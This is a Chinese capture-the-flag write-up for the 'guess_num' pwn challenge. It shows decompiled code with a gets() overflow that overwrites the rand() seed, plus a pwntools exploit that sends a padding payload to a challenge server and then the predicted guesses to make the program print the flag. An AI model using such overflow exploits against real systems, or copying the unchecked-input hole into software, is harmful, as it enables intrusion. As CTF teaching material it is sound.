guess_num
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么
题目附件:
file如下:
64位ELF文件
checksec如下:
IDA反汇编,查看main:
__int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v4; // [rsp+4h] [rbp-3Ch] int i; // [rsp+8h] [rbp-38h] int v6; // [rsp+Ch] [rbp-34h] char v7; // [rsp+10h] [rbp-30h] unsigned int seed[2]; // [rsp+30h] [rbp-10h] unsigned __int64 v9; // [rsp+38h] [rbp-8h] v9 = __readfsqword(0x28u); setbuf(stdin, 0LL); setbuf(stdout, 0LL); setbuf(stderr, 0LL); v4 = 0; v6 = 0; *(_QWORD *)seed = sub_BB0(); puts("-------------------------------"); puts("Welcome to a guess number game!"); puts("-------------------------------"); puts("Please let me know your name!"); printf("Your name:", 0LL); gets(&v7); srand(seed[0]); for ( i = 0; i <= 9; ++i ) { v6 = rand() % 6 + 1; printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1)); printf("Please input your guess number:"); __isoc99_scanf("%d", &v4); puts("---------------------------------"); if ( v4 != v6 ) { puts("GG!"); exit(1); } puts("Success!"); } sub_C3E(); return 0LL; }
存在缓冲区溢出漏洞
查看sub_C3E:
__int64 sub_C3E() { printf("You are a prophet!\nHere is your flag!"); system("cat flag"); return 0LL; }
这个程序会生成1~6的随机数,然后让你猜,猜中10次则会给你flag
注意到,main函数里的缓冲区溢出漏洞可以覆盖掉随机种子,我们就可以将种子覆盖成固定值,这样每次生成的都将是同一串数,我们可以将这些数试出来,输入即可
exp如下:
from pwn import * #io = process('./pwn') io = connect('220.249.52.133', 30596) payload = b'a'*0x28 io.sendlineafter('name:', payload) io.sendlineafter('number:', '5') io.sendlineafter('number:', '6') io.sendlineafter('number:', '4') io.sendlineafter('number:', '6') io.sendlineafter('number:', '6') io.sendlineafter('number:', '2') io.sendlineafter('number:', '3') io.sendlineafter('number:', '6') io.sendlineafter('number:', '2') io.sendlineafter('number:', '2') io.interactive()
